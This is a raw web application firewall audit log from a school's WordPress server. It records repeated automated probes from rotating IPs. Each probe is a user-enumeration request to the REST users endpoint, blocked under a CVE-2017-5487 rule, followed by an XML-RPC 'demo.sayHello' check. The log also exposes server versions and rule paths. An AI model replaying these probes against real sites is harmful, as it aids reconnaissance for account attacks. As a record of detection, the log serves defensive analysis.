"TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746713608858694 5153 (- - -) Stopwatch2: 1746713608858694 5153; combined=3925, p1=467, p2=3248, p3=22, p4=26, p5=95, sr=66, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d738301-Z-- --cbdbba17-A-- [08/May/2025:21:22:28 +0700] aBy-JI4K347NtBcwXKxhHwAAAIg 103.236.140.4 50594 103.236.140.4 8181 --cbdbba17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cbdbba17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbdbba17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714148816558 3570 (- - -) Stopwatch2: 1746714148816558 3570; combined=1537, p1=475, p2=1030, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbdbba17-Z-- --7ce57063-A-- [08/May/2025:21:22:32 +0700] aBy-KMP9GxxPAbCroFYtHgAAAEw 103.236.140.4 50598 103.236.140.4 8181 --7ce57063-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.101.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.101.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7ce57063-C-- demo.sayHello --7ce57063-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ce57063-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714152257389 5814 (- - -) Stopwatch2: 1746714152257389 5814; combined=4333, p1=525, p2=3581, p3=31, p4=32, p5=98, sr=72, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ce57063-Z-- --73fd0054-A-- [08/May/2025:21:22:59 +0700] aBy-Qys5rYyn3jlLjjIWVgAAANM 103.236.140.4 50606 103.236.140.4 8181 --73fd0054-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.216 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --73fd0054-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --73fd0054-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714179871569 2689 (- - -) Stopwatch2: 1746714179871569 2689; combined=1282, p1=435, p2=816, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --73fd0054-Z-- --685e3128-A-- [08/May/2025:21:23:02 +0700] aBy-RsP9GxxPAbCroFYtIAAAAEk 103.236.140.4 50610 103.236.140.4 8181 --685e3128-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.216 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.216 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --685e3128-C-- demo.sayHello --685e3128-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --685e3128-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714182898692 5751 (- - -) Stopwatch2: 1746714182898692 5751; combined=4177, p1=559, p2=3394, p3=34, p4=35, p5=92, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --685e3128-Z-- --cd796c08-A-- [08/May/2025:21:30:48 +0700] aBzAGI4K347NtBcwXKxhIwAAAIk 103.236.140.4 50646 103.236.140.4 8181 --cd796c08-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cd796c08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd796c08-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714648189241 3027 (- - -) Stopwatch2: 1746714648189241 3027; combined=1411, p1=459, p2=920, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd796c08-Z-- --79f6e65f-A-- [08/May/2025:21:30:52 +0700] aBzAHI4K347NtBcwXKxhJAAAAJE 103.236.140.4 50650 103.236.140.4 8181 --79f6e65f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.91.171.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.91.171.58 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --79f6e65f-C-- demo.sayHello --79f6e65f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --79f6e65f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714652562775 6123 (- - -) Stopwatch2: 1746714652562775 6123; combined=4435, p1=609, p2=3567, p3=46, p4=33, p5=104, sr=74, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79f6e65f-Z-- --7ae32e41-A-- [08/May/2025:21:34:48 +0700] aBzBCMP9GxxPAbCroFYtIQAAAFI 103.236.140.4 50674 103.236.140.4 8181 --7ae32e41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.44 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ae32e41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ae32e41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714888887631 2952 (- - -) Stopwatch2: 1746714888887631 2952; combined=1354, p1=445, p2=878, p3=0, p4=0, p5=31, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ae32e41-Z-- --8b56b047-A-- [08/May/2025:21:34:52 +0700] aBzBDCs5rYyn3jlLjjIWZwAAAMY 103.236.140.4 50678 103.236.140.4 8181 --8b56b047-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.44 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.44 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8b56b047-C-- demo.sayHello --8b56b047-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b56b047-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714892509115 4971 (- - -) Stopwatch2: 1746714892509115 4971; combined=3778, p1=498, p2=3075, p3=23, p4=24, p5=92, sr=117, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b56b047-Z-- --35194665-A-- [08/May/2025:21:34:54 +0700] aBzBDis5rYyn3jlLjjIWaQAAAMg 103.236.140.4 50682 103.236.140.4 8181 --35194665-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --35194665-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35194665-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714894832780 2129 (- - -) Stopwatch2: 1746714894832780 2129; combined=1054, p1=332, p2=693, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35194665-Z-- --959b931d-A-- [08/May/2025:21:34:58 +0700] aBzBEis5rYyn3jlLjjIWawAAANg 103.236.140.4 50686 103.236.140.4 8181 --959b931d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.214.1.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.214.1.159 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --959b931d-C-- demo.sayHello --959b931d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --959b931d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714898315958 4943 (- - -) Stopwatch2: 1746714898315958 4943; combined=3777, p1=453, p2=3108, p3=21, p4=24, p5=98, sr=65, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --959b931d-Z-- --c6ac9531-A-- [08/May/2025:21:35:17 +0700] aBzBJY4K347NtBcwXKxhJQAAAJI 103.236.140.4 50692 103.236.140.4 8181 --c6ac9531-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.87 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c6ac9531-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6ac9531-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714917771724 2438 (- - -) Stopwatch2: 1746714917771724 2438; combined=1159, p1=372, p2=754, p3=0, p4=0, p5=33, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6ac9531-Z-- --23e11473-A-- [08/May/2025:21:35:21 +0700] aBzBKcP9GxxPAbCroFYtIgAAAE4 103.236.140.4 50696 103.236.140.4 8181 --23e11473-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.87 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.87 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --23e11473-C-- demo.sayHello --23e11473-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --23e11473-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714921158686 4836 (- - -) Stopwatch2: 1746714921158686 4836; combined=3783, p1=443, p2=3118, p3=25, p4=29, p5=97, sr=67, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23e11473-Z-- --f775171e-A-- [08/May/2025:21:35:23 +0700] aBzBK8P9GxxPAbCroFYtIwAAAEg 103.236.140.4 50700 103.236.140.4 8181 --f775171e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.130 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f775171e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f775171e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714923666194 2039 (- - -) Stopwatch2: 1746714923666194 2039; combined=1028, p1=340, p2=661, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f775171e-Z-- --e07c903c-A-- [08/May/2025:21:35:26 +0700] aBzBLsP9GxxPAbCroFYtJQAAAFQ 103.236.140.4 50704 103.236.140.4 8181 --e07c903c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.130 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.130 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e07c903c-C-- demo.sayHello --e07c903c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e07c903c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714926411374 4307 (- - -) Stopwatch2: 1746714926411374 4307; combined=3325, p1=414, p2=2753, p3=22, p4=19, p5=69, sr=65, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e07c903c-Z-- --f6c4830f-A-- [08/May/2025:21:35:49 +0700] aBzBRY4K347NtBcwXKxhKgAAAJc 103.236.140.4 50716 103.236.140.4 8181 --f6c4830f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6c4830f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6c4830f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746714949564067 3272 (- - -) Stopwatch2: 1746714949564067 3272; combined=1470, p1=493, p2=944, p3=0, p4=0, p5=33, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6c4830f-Z-- --392ce625-A-- [08/May/2025:21:35:53 +0700] aBzBSSs5rYyn3jlLjjIWcQAAANY 103.236.140.4 50720 103.236.140.4 8181 --392ce625-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.32.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.32.19 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --392ce625-C-- demo.sayHello --392ce625-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --392ce625-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746714953639969 5510 (- - -) Stopwatch2: 1746714953639969 5510; combined=4109, p1=537, p2=3309, p3=30, p4=33, p5=114, sr=90, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --392ce625-Z-- --a7fe3f3b-A-- [08/May/2025:21:36:03 +0700] aBzBU44K347NtBcwXKxhLAAAAIE 103.236.140.4 50724 103.236.140.4 8181 --a7fe3f3b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux 